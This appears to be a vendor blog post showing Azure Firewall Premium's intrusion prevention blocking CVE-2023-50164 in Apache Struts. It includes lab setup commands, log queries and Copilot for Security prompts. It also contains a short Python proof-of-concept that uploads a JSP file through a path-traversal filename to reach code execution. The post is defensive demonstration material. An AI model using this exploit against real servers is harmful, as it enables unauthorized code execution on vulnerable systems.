Azure Firewall Protection Against Apache Struts Vulnerability - CVE-2023-50164

Introduction

 

Vulnerabilities and zero-day exploits continue to be a serious threat to systems worldwide. One such vulnerability is CVE-2023-50164, a critical issue in Apache Struts that can lead to critical security breaches if not properly mitigated. Protecting your systems from such vulnerabilities is paramount to prevent unauthorized access and data loss. Azure Firewall Premium provides a robust solution to safeguard your infrastructure against such threats. This blog post will explore the CVE-2023-50164 vulnerability and demonstrate how Azure Firewall Premium can effectively prevent this attack.

 

The Apache Struts Vulnerability - CVE-2023-50164

 

Apache Struts is a free-to-use, open-source framework designed for creating Java-based web applications. It follows the Model-View-Controller (MVC) design pattern, which helps separate the application logic, user interface, and control logic.

 

CVE-2023-50164, discovered in December 2023, is a critical vulnerability found in this framework. This vulnerability allows attackers to execute arbitrary code on the server, potentially leading to data breaches, system compromises, and other malicious activities. CVE-2023-50164 is a path traversal vulnerability resulting from flaws in the file upload logic. These flaws can allow an attacker to manipulate file upload parameters to enable path traversal, and in some cases, this can result in the uploading of a malicious file that can be used to perform Remote Code Execution.

 

This vulnerability affects Struts versions 2.5.32 and below and 6.3.0.1 and below. Users are recommended to upgrade to Struts version 2.5.33 (and greater) or Struts version 6.3.0.2 (and greater) to fix this issue. For more information on the vulnerability, affected versions and recommended upgrades refer to NVD - CVE-2023-50164 (nist.gov).

 

Azure Firewall Premium Protection

 

Whilst the recommendation is to upgrade an affected Apache Struts application to a patched version, upgrading the software may not be an option or may take too long. In such cases, attackers can take advantage of this vulnerability and attack your systems. Azure Firewall Premium provides comprehensive protection against this vulnerability through its Intrusion Detection and Prevention System (IDPS). Azure Firewall Premium is a cloud-native and intelligent network firewall security service that provides advanced threat protection that meets the needs of sensitive and regulated environments, such as the payment and healthcare industries.

 

The IDPS feature contains more than fifty categories with over 67,000 signature rules. The range of detection categories comprises malware command and control, phishing, trojans, botnets, informational events, exploits, vulnerabilities, SCADA network protocols, exploit kit activity, and numerous others. The Azure Firewall IDPS signatures are continuously updated in real-time to ensure protection against the latest zero-day threats with 20 to 40 new rules released each day.

 

To enable protection against the Apache Struts vulnerability in Azure Firewall Premium, IDPS must be enabled in either “Alert” or “Alert and Deny” modes. The signatures highlighted below prevent the Apache Struts malicious attacks.

 

 

Proof of Concept: Azure Firewall Blocking CVE-2023-50164

 

To simulate Azure Firewall Premium stopping an attack against a vulnerable Apache Struts application, we attempt a patch traversal attack in a controlled demo environment using the setup below:

 

 

Our setup consists of:

1. A Hub/central Virtual Network
2. Azure Firewall Premium deployed in its AzureFirewallSubnet.
3. A Kali Linux virtual machine which is deployed in an application subnet. We install Tomcat and a vulnerable version of Apache Struts.
4. An Ubuntu Linux client machine (attacker machine).

 

Azure Firewall Premium Configuration

 

We configure our Azure Firewall Premium with DNAT rules to access the Kali Linux virtual machine. Inbound traffic towards the virtual machine is NATed on the Azure Firewall’s Public IP address before being translated to the internal server’s IP address:

 

The translated ports – 22 and 8080 – allow SSH and HTTP (8080) access to the Kali Linux machine.

 

From the Azure Firewall Settings pane, under IDPS we set the IDPS mode to “Alert and Deny”.

 

 

Kali Linux Configuration

 

In our setup, we use Kali Linux to install a vulnerable Apache Struts application. We set up the server as below:

1. Update and install dependencies - including Java Development Kit (JDK) and Python - with the commands below:

sudo apt update

sudo apt upgrade -y

sudo apt-get install git curl python3 unzip openjdk-11-jdk -y

 

2. Next, we set the JAVA_HOME environment variable to ensure that Tomcat and other Java-dependent tools can consistently

    locate and use the correct Java installation. We use the commands below:

 

export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64

export JRE_HOME=$JAVA_HOME

export PATH=$PATH:$JAVA_HOME/bin

 

       3. We download and install Tomcat (version 9.0.83) to provide a servlet container for running our Apache Struts web application.

           The commands below download, extract, configure, and start our Tomcat server:

 

cd /opt

sudo wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.83/bin/apache-tomcat-9.0.83.tar.gz 

sudo tar xzf apache-tomcat-9.0.83.tar.gz

sudo chmod -R 755 /opt/apache-tomcat-9.0.83

sudo chmod +x /opt/apache-tomcat-9.0.83/bin/*.sh

sudo /opt/apache-tomcat-9.0.83/bin/startup.sh

 

We verify that the Tomcat server is running by checking the Tomcat server page in a web browser at “http://<Public_IP_Address>:9090”.

 

 

Apache Struts Deployment

 

In this step, we download and install a vulnerable Apache Struts application – version 2.5.10 - into our Kali Linux server. The commands below download and extract the Apache Struts version 2.5.10 archive, deploy the struts2-showcase application to the Tomcat server, and restart the Tomcat server to apply the changes.

 

cd /opt

sudo wget https://archive.apache.org/dist/struts/2.5.10/struts-2.5.10-all.zip 

sudo unzip struts-2.5.10-all.zip -d /opt

sudo cp /opt/struts-2.5.10/apps/struts2-showcase.war /opt/apache-tomcat-9.0.83/webapps

sudo /opt/apache-tomcat-9.0.83/bin/shutdown.sh

sudo /opt/apache-tomcat-9.0.83/bin/startup.sh

 

To verify that our Apache Struts application is running, we navigate to the application’s web page in a browser using the URL “http://<Public_IP_Address>:9090/struts2-showcase/fileupload/upload.action”. If the application is running correctly, you should see the file upload page. This is the specific page that contains the vulnerable file upload functionality that we want to exploit. The page is displayed below:

 

 

Exploiting the vulnerability and Azure Firewall Premium Protection against it

 

In our local attacker machine, we run a Python script to exploit the file upload vulnerability in our Apache Struts application. The script sends a specially crafted HTTP POST request to the vulnerable endpoint, attempting to upload a malicious JSP shell file (shell.jsp). This script demonstrates how an attacker could leverage this vulnerability to gain remote code execution (RCE) on the server.

 

1. Navigate to your home directory and open the Nano text editor and create a file named poc.py using the commands:

cd ~

nano poc.py

 

     2. Insert the following Python script into poc.py:

 

import requests

 

url = "http://<Public_IP_Address>:9090/struts2-showcase/fileupload/upload.action"

 

files = {

    'upload': ('shell.jsp', '<% out.println("RCE Test"); %>', 'application/octet-stream'),

    'uploadContentType': (None, 'application/octet-stream'),

    'uploadFileName': (None, '../../../../../../../../../../../../../../../../usr/share/tomcat9/webapps/ROOT/shell.jsp'),

    'caption': (None, 'exploit')

}

 

response = requests.post(url, files=files)

 

print(f"Status Code: {response.status_code}")

print(f"Response Text: {response.text}")

 

   3. Execute the above script using the command python3 poc.py (Note – in our test setup script the http port is 9090 as we

       are translating this source port to the actual port 8080).

 

We receive several errors as the connection is reset with Azure Firewall actively blocking the connection.

 

 

Post Attack Investigation and Analysis

 

After simulating the attack on the vulnerable Apache Struts application, it's essential to investigate and confirm that Azure Firewall Premium effectively blocked the malicious activity. To achieve this, we can utilize Azure Firewall logs and also use the Copilot for Security integration for Azure Firewall.

 

Azure Firewall logs provide detailed visibility into the firewall's traffic and operations, helping us track and analyze the blocked attack but logs can often be tough to manually parse especially when log volume is extremely high. The integration of Azure Firewall with Copilot for Security significantly enhances our ability to investigate and respond to security incidents with ease. Copilot for Security leverages powerful AI-driven tools to streamline the investigation process, offering insights and recommendations based on the analyzed Azure Firewall IDPS logs helping you respond with the speed and scale of AI.

 

Investigating with Azure Firewall Logs

 

To view the Azure Firewall IDPS logs, we navigate to our Azure Firewall and select Logs under the Monitoring section. We run the query below on the AZFWIdpsSignature table:

 

AZFWIdpsSignature

| take 100

 

From the results, we can clearly observe that the malicious traffic was dropped.

 

 

Enhancing the Investigation with Copilot for Security

 

Using the Copilot for Security integration with Azure Firewall, we can perform detailed investigations of the malicious traffic intercepted by IDPS. Copilot for Security allows us to swiftly investigate and analyze the attack using natural language prompts, providing detailed actionable results. The currently supported capabilities in this integration include:

1. Viewing top signature hits.
2. Getting details on an IDPS signature.
3. Searching across firewalls for an IDPS signature.
4. Generating recommendations to secure your environment using IDPS.

To use Copilot for Security with Azure Firewall, log into the Copilot for Security standalone portal associated with your environment and enable the Azure Firewall plugin:

 

To learn more about the Copilot for Security integration with Azure Firewall, you can check out - Azure Firewall integration in Microsoft Copilot for Security (preview) | Microsoft Learn

 

We start a new session and can use the prompts below to get details related to our attack scenario:

1. Show me a summary of the top 5 high severity attacks related to known CVEs that have been stopped by the Azure Firewall - <Firewall Name> - in the last 12 hours. Provide the output in tabular format for easier readability.
2. Tell me more about the Apache Struts vulnerability (CVE-2023-50164).
3. Was signature ID 2049667 only stopped by this one Firewall? What about others across this entire tenant?
4. What strategies can be implemented in my Azure Firewall and across my environment, to effectively guard against vulnerabilities similar to CVE-2023-50164?
   
   

Show me a summary of the top 5 high severity attacks related to known CVEs that have been stopped by the Azure Firewall - <Firewall_Name> in the last 12 hours. Provide the output in tabular format for easier readability:

As you can see, Copilot automatically detects that there are multiple signatures associated with the same CVE and it alerts you to that information. You can also click on the button in the top right corner to expand the table to see all the log information available.

 

Tell me more about the Apache Struts vulnerability (CVE-2023-50164):

Instead of having to go research the CVE yourself using external tools, you can simply ask Copilot to tell you about this CVE and why it is malicious.

 

Was signature ID 2049667 only stopped by this one Firewall? What about others across this entire tenant?

You can also have Copilot search across your entire infrastructure for this attack to make sure you are not vulnerable elsewhere.

 

What strategies can be implemented in my Azure Firewall and across my environment, to effectively guard against vulnerabilities similar to CVE-2023-50164?

 

Conclusion

 

CVE-2023-50164 is a serious vulnerability in Apache Struts that can lead to severe security breaches. While upgrading to the latest version of Struts is the best way to mitigate this vulnerability, Azure Firewall Premium offers an additional layer of protection with its advanced threat detection and prevention capabilities. Implementing Azure Firewall Premium can safeguard your systems from potential exploits and maintain a secure environment. Furthermore, integrating Azure Firewall Premium with Copilot for Security enhances your ability to investigate and respond to security incidents. This powerful combination not only blocks threats but also provides detailed insights and actionable recommendations to fortify your security posture. Implementing these tools ensures comprehensive protection and swift response to security threats, keeping your infrastructure safe and secure.

 

Resources:

• What is Azure Firewall - What is Azure Firewall? | Microsoft Learn
• Azure Firewall Premium Features - Azure Firewall Premium features | Microsoft Learn
• Azure Firewall IDPS signature rule categories - Azure Firewall IDPS signature rule categories | Microsoft Learn
• Azure Firewall integration in Microsoft Copilot for Security - Azure Firewall integration in Microsoft Copilot for Security (preview) | Microsoft Learn
• Azure Firewall integration in Copilot for Security: protect networks at machine speed with Gen AI (Blog) - Azure Firewall integration in Microsoft Copilot for Security
• CVE-2023-50164 Detail - NVD - CVE-2023-50164 (nist.gov)